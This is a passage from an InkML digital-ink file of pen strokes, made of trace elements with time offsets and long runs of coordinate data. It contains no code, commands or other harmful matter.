0,-6 1 3 0,0 0-6 16,0 0 5-16,0 0-9 0,14 1 10 0,-14-1-10 16,0 0-1-16,0 0-1 0,0 0 1 0,0 0 3 15,4 2-22-15,-4-2 16 0,0 0-18 0,0 0-13 16,0 0-28-16,0 0-22 0,0 0-80 0,0 0-150 16,-8 14 66-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="18473.9826">10467 5424 50 0,'0'0'51'0,"-4"-3"-7"0,4 3-9 0,0 0-10 16,0 0-2-16,0 0-4 0,0 0-1 0,0 0-8 15,0 0 5-15,-1 17-4 0,1-7 1 0,0 7-3 16,-4 2 0-16,3 5-7 0,1 2 14 0,1 1-11 16,4 3 0-16,0 2 3 0,3 1 2 0,1-1-5 15,8 13 4-15,-7-14-1 0,9 0 3 0,7 11-8 16,-4-12 2-16,12 6-4 0,4-1-1 0,-1-2-15 16,6-2-9-16,1-1-9 0,2-3-26 0,4-1-61 15,5-2 27-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19721.4469">21104 5311 50 0,'-4'-7'54'15,"0"0"5"-15,3 1 3 0,-3 4 8 0,0-2-25 16,-1-1-8-16,4 3-2 0,-1-2-8 0,2 4-22 16,-6-4 12-16,6 4-3 0,0 0-1 0,-10 8-4 15,4-4 3-15,-2 3-6 0,0 0 0 0,5 3 1 16,-3-3-7-16,4 1 3 0,1 3 6 0,-1 0-6 16,4-1 8-16,-1 3-2 0,3-2-6 0,2 0 11 15,1 0-9-15,1 0 1 0,5 0-1 0,-2-1 5 16,3 0-3-16,1-1 3 0,-4-2-2 0,2-4-10 15,0 0 16-15,1 1-4 0,-2-2 1 16,5-2-1-16,-5 0 0 0,2-4 4 0,-2 0 7 0,-1 0 0 16,2 0-10-16,-2-3 20 0,1 1-10 0,-3-3 22 15,-2-1 25-15,1 3-9 0,-3 2-7 0,-2-2 4 16,-1 0 4-16,-1-1-17 0,2-1-6 0,-6 2-2 16,-2-1-6-16,0-2-10 0,-2 2 2 0,-4 1-15 15,-1 2 7-15,-4-1-2 0,-4 6-3 0,2-2-1 16,0 4-7-16,4-2-7 0,1 0 12 0,4 4-13 15,0-2-4-15,3 2 0 0,2-1-4 0,4 4 7 16,0-1 5-16,4 4-1 0,5 0 8 0,-1-3 0 0,8 2-7 16,0 1 7-16,4-3-2 0,8-1 4 15,-1 0-4-15,1-6-2 0,-1 0-1 0,-7 0 3 16,-7 0 3-16,1 0 2 0,-5-3-2 0,-2 6-24 16,0-3-25-16,-7 0-54 0,0 0-95 0,0 0-210 15,0 0 93-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20988.0602">17251 5541 19 0,'0'0'6'0,"0"0"8"0,0 0-1 0,0 0-2 16,0 0-4-16,0 0-1 0,0 0 2 0,0 0-2 16,0 0-5-16,0 0 3 0,0 0 0 0,0 0-5 15,0 0 1-15,0 0 2 0,-5 14 1 0,1-9-2 16,-5 5 7-16,0 2-6 0,-4 5 1 0,-8 7 1 16,-5 0 4-16,-11 12 5 0,-5 0-2 0,-4 2 2 15,-3 0-3-15,-1 3 3 0,-3-4 0 0,-19 17 1 16,21-18 8-16,-23 17-7 0,21-18-2 15,-3 0 1-15,1-3 3 0,4 0 3 0,-1-3-8 0,3-2 10 16,2-6 4-16,-9 1-5 0,1-2 6 0,2 3 1 16,-3-5-4-16,-3 3 5 0,-3-2 1 0,-1-3-6 15,-26 7 1-15,25-7-1 0,-26 6-5 0,25-11-1 16,-28 7 9-16,3-2 1 0,25-5-5 0,-27 3 1 16,3-2-4-16,-6 0-7 0,-1-1-1 0,-5-1-2 15,-1-2 6-15,0 3-5 0,3-7 1 0,1 0 10 16,5-3 3-16,26-1-13 0,-26-6 6 0,25 3-9 15,-24-8 7-15,28 2-7 0,-1-1 3 0,-26-6-5 16,26 4 3-16,-23-5 1 0,28 3-5 0,0-2 3 16,-3-2-1-16,4-3 0 0,1-1 7 0,2 2-5 15,-1-1-3-15,3-2-7 0,0-4-3 0,-1 1 5 16,1-1 3-16,5 1-12 0,3-2 16 0,5 1-6 16,8 5-8-16,5-2 15 0,0 1-8 0,1-1 3 15,9 4 7-15,-2-2 5 0,6 2-5 0,2 4 1 16,3-1-4-16,2-1-3 0,-1 3 3 0,7-1 0 15,1-1-3-15,2 0-8 0,6 0 2 0,5-5-1 16,6-1 2-16,8-1 2 0,12-8-4 0,11-1-4 16,3 3 1-16,4-1 5 0,25-11-7 0,-23 18-6 15,21-13 8-15,-21 12 1 0,24-9-4 0,-22 14 8 16,30-8 0-16,-5-1-4 0,-24 9 1 0,28-7 0 16,-3 4-1-16,-28 4 1 0,2 4 5 0,3 3-3 15,-3-4 4-15,1 2 0 0,0 3-9 0,1 2 16 16,26-3-16-16,-27 5-1 0,2 1 7 0,26 2-11 15,-26 0 10-15,2 2-11 0,24 4 10 0,-30 0-9 16,3 0 2-16,-2 1 2 0,2 4 19 0,2 0-21 16,0 5 2-16,-2-2-1 0,2 0 8 0,-3 4 3 15,2 3-3-15,-1 1-5 0,-3 1-9 0,-1 3 15 16,-6 0 1-16,1 2 1 0,-3-1-3 0,-1 4 4 0,-4 0-7 16,1 0-4-16,-4 4 2 0,-1 3 7 15,1-3 1-15,-1 0-7 0,-2 2-1 0,1 2 6 16,-3 1-4-16,-1-3 1 0,-3 2 6 0,0-2-2 15,0 2-2-15,-8-6 10 0,1-3-13 0,0 2 5 0,6 11 1 16,-10-11-1-16,1 1 3 0,-7-3 2 16,6 2-5-16,-7-3-3 0,1-3-3 0,-3-1 7 15,-6-4-12-15,0-2 2 0,-3 0 5 0,-3 1 2 16,0-4-5-16,-5 2 1 0,-1-3 0 0,-5 4 9 16,-10 6-9-16,-4-1 2 0,-4-1-9 0,-6 1-21 0,-13 6-20 15,0 0-32-15,-7 3-70 0,1-2-164 16,-5 1 72-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32701.7187">7372 5114 9 0,'0'0'17'0,"6"4"0"0,-2-2-4 16,-4-2-3-16,5 1 2 0,-1 1-4 16,1 0 1-16,-1 0-1 0,0 0 2 0,1 0-4 15,0 1 1-15,0-3-1 0,0 3 1 0,3 0-2 16,-3-2 0-16,8 1 3 0,-3 0-3 0,-1 3 4 16,5-2-3-16,4-1-2 0,1 0 2 0,2 0 1 0,-1 0-1 15,2 2 7-15,8-2 0 0,1 1 0 16,-3 0 4-16,4 0-3 0,-1 0-2 0,1 1-3 15,4-1 3-15,2-1 13 0,17-2 0 0,1 1-1 16,-1-2 7-16,-1 2-6 0,1-1-5 0,0 0-6 16,2 2 6-16,2-2 1 0,6-2-1 0,26 2 3 0,-26 2-3 15,-1-2 0-15,4 4-3 0,23-1-2 0,-29 0-1 16,6 1 4-16,25 0-3 0,-28 1 3 16,27-1 2-16,-24 1-7 0,28-1 7 0,-7 5-8 15,7-1 2-15,-4 3 4 0,-27-5-14 0,36 3 4 16,-10 7 3-16,-1-3-1 0,-1 4-1 0,6 0 3 0,3 0-2 15,4-3-4-15,-3 2 0 0,0-3-5 0,7 0 11 16,-6-1-10-16,2 1 6 0,9 1-3 0,1-2 1 16,1 1 1-16,0 1 0 0,-3 1 1 15,-4 0-2-15,0 2 0 0,5-1-2 0,-5-2 0 16,7 2-1-16,4-2 8 0,1 3 1 0,-2-1-3 16,0-3-4-16,7 3-5 0,-1-3 7 0,2 3 0 15,3 1-2-15,14-4 5 0,-16 2-3 0,4-1-4 16,3 2 0-16,3 0 2 0,2-3 11 0,4 3-12 15,-6 1 7-15,6 1-8 0,-6 0 9 0,4-3 1 16,2 3-6-16,6-1 4 0,-1 2-3 0,-2-1-5 16,-1 0 3-16,7-4 5 0,6-1-2 0,1 4 0 0,-4-5-3 15,-5 1 1-15,4 0 9 0,3-1-4 16,-2 3-3-16,0-5 4 0,-1-3-2 0,-4 2 0 16,-2-8 3-16,1 3-2 0,-4-4-3 0,-5 0 2 15,-9-1 1-15,-6 1-1 0,-6-3 0 0,-6 2-1 0,-6 3-3 16,-13 0 1-16,-28-2 0 0,3-2 3 0,-7 2-1 15,-2-2 1-15,-3 2 0 0,-2-3 0 0,-19 2-1 16,-1 2-3-16,-10-2 2 0,-7 1-7 16,-2 0-2-16,-3-4-6 0,-3 4-25 0,-8 0-18 15,15 0-18-15,-15 0-3 0,5 5-5 0,-5 0-3 0,-5 7-25 16,-18 11-55-16,-18 8-172 0,-43 14 77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14T15:55:09.8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7401 8823 20 0,'0'0'22'0,"0"0"0"0,-1-4-3 16,1 4 4-16,0 0-6 0,-4-2 0 15,4 2 6-15,0 0-6 0,0-4 7 0,0 4-7 16,-4-4-2-16,4 4 0 0,-4-5 3 0,4 5-3 16,-5-3-10-16,3 2 3 0,2 1 0 0,-8-3 2 0,4 2-4 15,4 1 2-15,-7-1-6 0,2-1 2 0,5 2-2 16,-11-2 2-16,11 2 2 0,-9 2-2 16,9-2 0-16,-9 3-3 0,3-2 0 0,-1 3-5 15,0-1 3-15,1 2 1 0,-2 1 5 0,-2-1-7 16,2 3 0-16,2-1 6 0,-2 0-2 0,-1 2 0 0,5-4-10 15,-1 0 4-15,4 2-4 0,-2-1 11 16,1 0-6-16,-1 0 5 0,3 0-7 0,0-1 4 0,0 2 1 16,0-1-8-16,0 0 11 0,0-1-9 15,1 1 8-15,-1 0 2 0,2-1-2 0,0-1 4 0,1 1-6 16,-2-2 0-16,2 1-6 0,-2-1 12 0,3 3-6 16,-3-4 5-16,4 1-4 0,-1 0 2 0,0 0-1 15,0 0-2-15,1 0 4 0,-1 0 3 0,1-1 1 16,1-1-1-16,2 1-4 0,-2 1 3 15,1-1 6-15,1-2-4 0,3 2-11 0,-1-2 15 0,-2 0 4 16,3-2 0-16,1 0-3 0,0-1 2 0,1 0-1 16,0 1 10-16,-2-3-1 0,1 0-2 0,6-3-7 15,-3 0 3-15,3-2 1 0,1 1 0 16,-1-2-9-16,-1 0 3 0,-4 1 15 0,-1 0-12 0,0 1-4 16,-4 0 3-16,-1 0 4 0,2 0 0 0,-1-1 2 15,-2-1-10-15,-2 0 0 0,-3 0-7 0,3 0 7 16,-2 2-3-16,0-3-2 0,-2 3 1 0,-4 0 7 15,4 1-6-15,-5-1 2 0,1 2 8 0,0 2-15 16,0-2-5-16,-2 0 6 0,-3 1 1 0,2 0-1 16,-4 1-5-16,4 2 4 0,0 0-15 0,1-1-7 15,1 3-13-15,0-2-14 0,5 3-16 0,-10 2-54 16,4 2-126-16,-1 2 56 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10835.0033">8059 5734 6 0,'-4'-2'58'0,"0"-1"-5"16,-2-1-3-16,1 2-3 0,1 0-5 0,4 2 1 15,-6-3-2-15,1 0-4 0,5 3-6 0,-5-3 3 16,5 3-5-16,-4-2-11 0,4 2-1 15,0 0 6-15,-6 0-12 0,6 0-5 0,0 0 5 16,0 0-8-16,0 0 5 0,-7 6 1 0,5-1-2 0,-5 3 0 16,2 1-10-16,-1 6 11 0,-3 3-6 0,1-1 4 15,-1 1-5-15,-1 7-2 0,1-9 4 0,4 2 2 16,0-1-1-16,4 0 0 0,1-1 2 0,1-2 1 16,3 1-5-16,2 0-2 0,0-5-4 0,2 1 10 15,2-2-2-15,2-1 2 0,3 0 9 0,3 0-4 16,-1-5 4-16,4 0 6 0,1-1-4 0,6-4 7 15,-1-2 6-15,0-4-11 0,1 0-1 16,-2-3 1-16,-1-3 3 0,2-1 4 0,-3-3-12 16,-1 1 9-16,-1-1-10 0,-3-2 3 0,-6 4 8 0,-4-1 3 15,2 1 8-15,-5-2-4 0,-3 0 2 0,-1-2-10 16,-4-4 4-16,-1 4 0 0,-4 1 1 0,-3-4-6 16,-3-1-3-16,3 6 2 0,-7-3-7 0,2 2 0 15,1 5-1-15,-3-1-2 0,2 4-3 0,1 1-1 16,1 0-1-16,2 4-1 0,2 0-8 0,-3 2-18 15,3 1-28-15,3 1-24 0,-2 4-7 0,-1 5-12 16,2 2-3-16,-2 8-61 0,-4 7-168 0,4 1 75 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11518.5698">11119 5731 42 0,'-29'7'61'0,"3"3"-3"0,2 2-6 15,7-3-6-15,1 0-3 0,1 4-8 0,3-2-1 16,0 1 2-16,6 2-12 0,-4-1 2 0,3-1-5 16,5 2 2-16,-2-2-4 0,1 0 3 0,3 0-1 15,3 1-5-15,2 2-2 0,5-1 1 0,2-2-4 16,2 0 22-16,4 1-13 0,6-3 5 0,3-2-4 0,3 1 3 16,2-4-4-16,0-1 4 0,7-4-8 15,-2-2 13-15,0-1-11 0,0-4 3 16,-1 0 6-16,-6-1 5 0,2-3-4 0,-2 0 6 0,-4-1-12 15,-2-1 6-15,-3-4 9 0,-2 0-12 0,-5 3 2 0,4-7 6 16,-5-1-9-16,1 0 5 0,-9 4 1 16,0 0-2-16,-1-1 1 0,0 0-9 0,-4-3 0 15,0-2 7-15,0 6-15 0,-4 2 2 0,3-1-2 16,-3 3-4-16,3 3-12 0,-3 1-23 0,0 1-36 0,0 2-57 16,3 6-81-16,0-1-217 0,1 2 96 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12264.454">14530 5966 38 0,'0'13'35'0,"0"3"1"0,0 3-8 0,-1 0 2 15,1 9-3-15,-2 3 6 0,-1-3-6 16,0 2-3-16,-1 3 16 0,3-1 10 0,-4 2-5 0,1-1-3 16,-1 1-10-16,2-1 2 0,-1 0-2 0,-2-3-3 15,2 0 1-15,2-2-6 0,-1-3-4 0,1-6 8 16,0 1-10-16,1-4 9 15,0-1-12-15,-1 0-3 0,1-4 4 0,1-2-3 0,0-1-4 0,0-2 10 16,0-2-7-16,1 3-6 0,1-3 4 0,-2-1 0 16,0-3 1-16,-2 6 9 0,2-6-7 0,0 5-2 15,0-5 13-15,0 0-14 0,0 0-17 0,-2 2-2 16,2-2-25-16,0 0-20 0,0 0-20 0,0-16-53 16,0 6-139-16,-1 0 62 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12768.6242">14577 5765 57 0,'-1'-2'69'0,"1"2"-10"0,0 0-9 0,-4-3-2 16,4 3-3-16,0 0-11 0,0 0-15 15,0 0 8-15,-18 5 3 0,8 3 1 0,-4-2-6 16,-1 8-4-16,-2-4 2 0,-1 1-7 0,-5 6-3 16,8-5 3-16,-3 1-2 0,4 0-7 0,-4-1 5 0,5 0 5 15,-1 1-9-15,5-4-2 0,1 1 2 16,1-1 4-16,-1 1-11 0,2-3 4 0,-1 2 1 0,4-5 0 16,-1 2-7-16,1 1 1 0,-1-2 4 15,3-1-12-15,0-1 6 0,-2 1-14 0,3 0 4 16,-1-1 8-16,1-3-4 0,1 7-9 0,2-3 3 0,-2 0 2 15,4-1 4-15,-2 0 1 0,1-1-5 16,1 0-6-16,-1 0-6 0,3-1 2 0,-7-1-1 16,14-1-2-16,-5 1-6 0,0-4-3 0,4 2 0 15,-7-3-1-15,3 2 4 0,1-1 5 0,-2 0-19 0,-3-1-47 16,2 4 21-16,-1-5 185 0,-1 1-143 0,0 2 21 16,-1-2-15-16,3 0-24 0,-4-1 11 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12819.4882">14516 5899 8 0,'3'-4'-2'0,"0"1"-1"16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13065.6041">14559 5884 2 0,'0'0'3'0,"8"2"2"0,-3 1 7 16,-3 0-1-16,4 0-2 0,-1 2 1 0,1 0 4 0,-2-1 1 16,4 3 0-16,-3 2 7 0,3-1-3 0,-1 3 6 15,1 0-5-15,1 2-1 0,1 1 5 0,2 3 5 16,3 3 0-16,2 2-1 0,-6-6 12 0,6 5-12 15,-2 1-5-15,4-2 0 0,-2 1 10 0,-2-1-7 16,4 0 2-16,-5-6 0 0,7 5 3 0,-7-5-4 16,0 3-9-16,0-2 1 0,-1-5-7 0,1 5 4 15,-1-1-7-15,-1-3 2 0,-3-2-5 0,7 3 9 16,-7-5-5-16,-2 4 3 0,1-3-7 0,2 1 4 16,-1-2 2-16,-2-1-2 0,-1 2-7 0,0-3 17 15,-2 0-12-15,1 2-16 0,-1-1 4 0,0-2-17 16,-3 3-10-16,-1 1-3 0,0-3-13 0,-5 4-16 15,-4-1-35-15,-3 4-107 0,-3-3 48 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14430.4562">4730 11523 27 0,'3'-5'79'0,"-3"5"-16"16,0-4-1-16,0 4-1 0,1-6-10 0,0 3-10 16,-1 3 0-16,3-8-6 0,1 8-4 0,1-3-1 15,1 0-1-15,4-1-8 0,-1 1 13 0,0-3-19 16,4 3 3-16,-3-1-6 0,2 1 1 0,2 0 2 15,-1 0-6-15,1 0 5 0,1 2-6 0,7-2 4 16,-3 2-6-16,2 2 1 0,0-1 5 0,0 1-1 16,8 1-3-16,-6-2 1 0,-3 4-3 0,11-1 1 15,-1-1-1-15,-1 4 0 0,4-1-8 0,-1 2 16 16,3 0-7-16,-1 2-4 0,5-2 4 0,-1-1 1 16,-1 1 0-16,14 2-5 0,-1 3-7 0,-13-5 4 15,14 2 7-15,-13-2 1 0,16 3-3 0,1 0-2 16,-2 2-5-16,1-2 8 0,3-3-6 0,4 0 4 15,2-2 1-15,-3 4 7 0,5-3-11 0,-1 1 10 0,-3 2-5 16,3-7-4-16,-4 4 1 0,1-2 0 0,2-1-3 16,1 0 2-16,-1 3 5 0,-1-5-4 15,2 1-2-15,-4-1 1 0,3 1-2 0,1 0 5 16,-1 3-1-16,4-8 5 0,-2 6-5 0,-1-7 4 16,29 4 10-16,-2-3-7 0,-23-2 8 0,29-2-2 15,5 0-6-15,2-3 7 0,-1-2-4 0,6-1-3 16,-3-2 0-16,6-2 5 0,2-1 13 0,4 2-11 15,3-4 8-15,2 6-9 0,-4-3 12 0,-7 2-11 16,-2 4-2-16,-3 3 0 0,0-1 2 0,-3 4-1 0,-5-2-3 16,-5 1-7-16,-29 4-4 0,30 0 2 0,-35 4-3 15,0-1 11-15,0 1-9 0,-1-2 1 0,-3 3 6 16,-1 0-2-16,-14-1-5 0,-1 1-1 16,-2 1 1-16,-1 0 6 0,-2-1-3 0,-4 3-2 0,0 1 10 15,-4-1-8-15,-10 2-9 0,-1 3-19 0,-3 1-25 16,0 5-50-16,-7 2-117 0,-5 8-230 0,-7-8 101 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22332.8114">14750 6077 8 0,'11'-13'38'0,"-2"0"-2"0,4 0 5 16,-4-1 2-16,2 3-5 0,1-3-5 0,-6 4 3 0,7-2-1 15,-4-2 3-15,-1 2-14 0,0 4 11 0,-1-6-4 16,-2 5 13-16,-1-2 8 0,1 2-15 16,-1-2 0-16,-1 0 1 0,-1 2 1 0,-2-3-2 15,-1 2 3-15,0 0-2 0,-2 1-11 0,2-1 4 16,-3 2 2-16,0 1-7 0,0 1 2 0,2 2-4 0,-4-1-6 16,4 0 8-16,0 1-16 0,-1 2-7 0,-1 0 10 15,4 2-11-15,0 0 13 0,-14 3-2 16,1 2-2-16,-1 7-12 0,-4 0 3 0,-5 5 11 15,2 4-8-15,0-1 5 0,2 1-11 0,2 1-7 0,1-2 11 16,3 2-4-16,5-3 1 0,2-1 2 0,-2 6 0 16,3 0 0-16,5-3-1 0,0-2-1 0,0-1-1 15,3 1 3-15,2 0 0 0,1-3-7 16,2-2 9-16,-2 0-1 0,3 0-8 0,1-4 10 0,2-1-6 16,4-2 5-16,2-2 1 0,5-4-5 0,8-2 6 15,1-2 4-15,1-3 0 0,3-2-1 0,-1 0 0 16,-5-3 1-16,-3-3 2 0,2 1-13 0,-2-1 14 15,-1-2 4-15,-3-4-2 0,-1-1-8 0,-1-1 6 16,4-1-2-16,-7 0 1 0,1 0 1 0,0-2 0 16,-6 2 2-16,-2 1 11 0,-5 5-1 0,-2-2-3 15,0 3 1-15,0-1-4 0,-7 2 4 0,0-1-5 16,0 1 0-16,-1 1 6 0,-5 1-5 0,4 3-4 16,-3-3 1-16,1 3-4 0,-1 1-1 0,1 1 3 15,1 0 6-15,1 2-12 0,0 2-3 0,0 0-7 16,1 0-19-16,-1 3-15 0,5 1-3 0,-11 3-12 15,0 2-5-15,2 2-12 0,-5 5-5 0,-5 6-8 16,-1 5-14-16,-1 0-90 0,-2 7-201 0,0-2 88 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23430.0929">16057 6209 42 0,'91'15'47'0,"1"-1"-16"0,0 2 1 0,-4 0-4 16,2 3-1-16,-28-8 3 0,2 4-6 0,32 3-3 15,-32-2 3-15,24 6-2 0,-28-7 3 0,4 1-11 0,-3 1 4 16,2 2-8-16,-2-1-1 0,2-1 2 15,-5 1-1-15,0-1 9 0,-2-1-4 0,1-2-3 16,-3 1-4-16,8-1 2 0,-11 1 1 0,8-1 7 0,-2-4 3 16,2 2-3-16,-1-2-6 0,-2 0 6 0,2-1-7 15,-3 1 5-15,2 0-3 0,-6-3 5 0,-13-2-6 16,1-1-6-16,-5 1 3 0,-2-1 4 16,-1-3-4-16,-12 1-2 0,0 2 4 0,-6-4-3 0,-1 1 3 15,-4 1-10-15,-1-2-10 0,-2 0-14 0,-1 2-21 16,-4-2-5-16,-1 6-53 0,-8 0-109 15,-9 2 48-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24204.3515">4061 7374 16 0,'20'-1'39'15,"12"-1"-1"-15,5 0 1 0,14-7-8 0,9 6 2 16,2-2-3-16,4 0 0 0,25 1-2 0,-27 2 8 15,2-1-5-15,34-3 2 0,-7 2 1 0,2 0-1 16,-3-2-6-16,6-1-7 0,-1 2 12 0,2-2-1 0,4 0 0 16,-2 0 9-16,-1 0-9 0,3-1-7 0,1 2-7 15,-4 2 10-15,-2-1-6 0,0 4 6 16,-2-3-13-16,-33 3-2 0,1-1 2 0,2 1-1 16,-3 0 5-16,-4-3 8 0,-2 4-13 0,2-3 1 15,-9 2-2-15,-13 0-7 0,-1-2 1 0,-6 2-1 0,-3 2 4 16,-9-1 10-16,-4 0-17 0,-1 0-11 0,-3 2-14 15,-2 0-14-15,-1 2-17 0,-3 2-16 0,-2 4-58 16,-9 5-139-16,-3 1 61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14T15:58:12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10403 3489 16 0,'-4'4'29'0,"-2"1"-3"0,2-1 1 0,-1 3-4 16,1-1 5-16,-1 4-6 0,0-1 4 0,-1 2-5 16,1 0 0-16,-2 4-4 0,2 1 4 0,0-1-6 15,1-4-1-15,0 3 0 0,4-3 6 0,2 0-13 16,0 1 4-16,1-2 3 0,-2 1-8 16,2 0 1-16,2-3 5 0,1 0-2 0,-1-3 2 15,0-1-1-15,4-1 15 0,-2 0 10 0,3-2-2 0,3-2 10 16,3-2 5-16,3-4-5 0,-2 0-2 0,2-5-1 15,-6 1 4-15,2 0-9 0,1-5 4 16,-1 1-3-16,-1-6-1 0,-4 5 6 0,-2-4-10 16,1-2 9-16,-6-4-6 0,-1 3-12 0,-3-4 2 15,0 7-2-15,-5-5 1 0,0 0-9 0,-2 1-9 0,-2 0 4 16,1 4-2-16,0 5-2 0,-5-2-12 0,5 5 1 16,0 2-24-16,-1 0-9 0,2 3-34 15,3 3-29-15,-4 3-63 0,-1 6-177 0,1 2 79 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="634.2548">14042 3243 10 0,'-4'13'45'0,"-4"4"-1"0,-1 8-3 16,2 2 5-16,-5 0-2 0,5 3 7 0,-4 5-7 15,2-3-5-15,-5 14-1 0,5-12 6 0,-5 11-10 16,4 0-5-16,-1 1 2 0,4-12 2 0,2 4-5 16,-3 8-5-16,5-12-2 0,1 13-13 15,-2-11-12-15,2-2-15 0,-1 3-20 0,1-4-6 0,0 1-46 16,0 1-100-16,-2-6 45 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1408.3567">16848 3384 11 0,'11'8'11'0,"-3"-1"-1"16,-1 3 3-16,-1-2 1 0,-1 2-7 0,-5 1 1 15,2 0 18-15,-5 4 1 0,-5 2 3 0,-1-1-6 16,-3 1 0-16,-5 0 1 0,-3 1 0 0,-1-1-5 16,3-4 6-16,0 0-4 0,-2 2 4 0,-4-2-8 15,6-3-3-15,2-1 5 0,-1-1 0 0,6-2-8 16,0 2-6-16,3-3 1 0,2 2 4 0,1 2-8 0,3-4 8 16,2 3-9-16,3-1 8 0,5 5-7 15,5-5 0-15,8 4-1 0,9-2 4 0,5-4-3 16,19 4 0-16,0-2-7 0,2 0-3 0,2-3-10 15,4 2-20-15,-1 0-37 0,1-2-79 0,-2 2 36 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2296.1882">20619 3291 3 0,'-8'19'4'16,"-3"-2"2"-16,-1-1-6 0,-2 6 3 0,-2-8-2 16,2 2 1-16,-1-4 1 0,5 0 3 0,-2-1-3 15,4 0 0-15,-3 3-5 0,7-4 5 0,-1 1-2 16,1 1-1-16,4 1 4 0,-1 0 3 0,2 2-3 15,3 1 1-15,4 1-3 0,-2-2 2 0,7-1-7 16,-1 2 5-16,-1 0 5 0,2-1-5 0,1-1 2 16,-1 0-2-16,1 0 5 0,-2 1-2 0,0-3 0 15,-3 2 0-15,2-2 1 0,-4 0 6 0,-1-2-3 16,-1 1 4-16,-1-3-3 0,0 3-1 0,-4-4 9 16,0 2 8-16,0 0 5 0,-4-2-1 0,-5 1 4 15,0 1-1-15,-6-2 1 0,-4 0-2 0,-9 4 1 16,-3-4-8-16,-1 0-5 0,-3-2 1 0,3-4-1 15,2 3 7-15,0-2-6 0,1 2-15 0,2 2-25 16,-1 2-73-16,1-2-99 0,7-1 44 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3764.8575">4505 6747 6 0,'0'0'43'16,"-6"-4"-5"-16,6 4 1 0,-4-3-7 0,4 3-9 16,-5-2 1-16,5 2-4 0,0 0 2 0,-3-3-4 15,3 3-4-15,0 0-7 0,0 0 4 0,0 0 0 0,0 0-1 16,0 0-6-16,0 0 3 0,0 0-1 15,0 0-1-15,9 13-2 0,-3-9-1 0,-1 0 2 16,2 4 7-16,2-1-3 0,0 1-3 0,-1 2 2 16,5 2-7-16,-2 0 2 0,-2 0-9 0,5-1 12 15,-5 3 2-15,1-3-6 0,3 3-2 0,-4 0-2 16,0-2 3-16,5 1 0 0,-2 0-2 0,-1 2 4 0,2-1 2 16,-2-1 2-16,3-1 2 0,1 3-5 15,-2-2 5-15,3-1-6 0,2 2-1 0,-3-2 7 16,4-2-2-16,4 6 0 0,3-3-5 0,-3-2 7 0,2 1 8 15,-4-6-11-15,6 3-3 0,-3-2-1 0,-2-2 11 16,-1-2-6-16,7 3 5 0,-1-5-5 0,-5 0 5 16,1-1-3-16,-3-1-1 0,1-2 3 0,1-1 1 15,7 0 1-15,-3-2 9 0,-5 2-4 0,0-3-2 16,-3 0 6-16,5-1-8 0,0-3 5 0,-4 0 4 16,-1 0-11-16,0-2 6 0,-2 3-4 0,1-2 0 15,2-12-3-15,-6 12 1 0,2-5 1 16,-1-4 2-16,3-2-8 0,-7 7 2 0,-1 0 10 0,2 5-5 15,-5 0 6-15,-1-1 8 0,0 1-8 0,-1 1-18 16,1 1 12-16,-4-2 13 0,3 0-12 0,-2 0-4 16,0-2 1-16,0 1-1 0,0-1-4 0,-1 5 0 15,-1-3 1-15,1 0 8 0,-2 1-11 16,1 0-2-16,0 2 5 0,-1 0-2 0,-1 0 1 0,2 0 2 16,0 1-5-16,-2 1-1 0,2 1 0 0,-2 1 0 15,1 0-9-15,-1 1 31 0,2 3-12 0,-3-6 1 16,3 6-19-16,-1-5 11 0,1 5-7 0,-3-4 11 15,3 4-3-15,-1-3-3 0,1 3 8 0,0 0 0 16,-2-4-9-16,2 4 1 0,0 0 3 0,-3-3-9 16,3 3 7-16,0 0 5 0,0 0-7 0,0 0 0 15,-5-2-2-15,5 2-4 0,0 0 2 0,0 0 1 16,0 0-3-16,0 0 5 0,0 0-19 0,0 0-4 16,0 0-15-16,0 0-8 0,0 0-1 0,0 0 2 15,-4 10 8-15,4-4-18 0,0 1-5 0,0 2-9 16,0 0-53-16,3 3-132 0,-3 1 59 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7812.4067">13710 5484 1 0,'11'0'2'0,"-1"2"0"0,3-2 7 16,-4 2-9-16,5-2 2 0,-5 1-2 0,4 2 1 15,-2-3-5-15,0 1 10 0,0 1-7 0,-2-2 2 16,3 0 6-16,-4 3-12 0,0-3 7 16,0 1 0-16,0 0-3 0,0 0 1 0,1 0 4 0,-1-1-2 15,-2 1-3-15,3-1-2 0,-4 2 10 0,3-1-2 16,-3-1 0-16,-5 0 3 0,14 0-1 0,-9 0-5 16,3-1 2-16,0 1 8 0,-8 0-4 15,16-2 4-15,-8 2-5 0,2-1 5 0,-2 1-6 16,0-1-1-16,-1 1 0 0,2-1 4 0,-1 1-4 0,-2-1-1 15,1 1 3-15,-7 0-5 0,11-1 3 16,-6 1-4-16,-5 0-4 0,8 0-2 0,-8 0-4 0,8 1-5 16,-4 0-9-16,-4-1-24 0,8 3 11 0</inkml:trace>
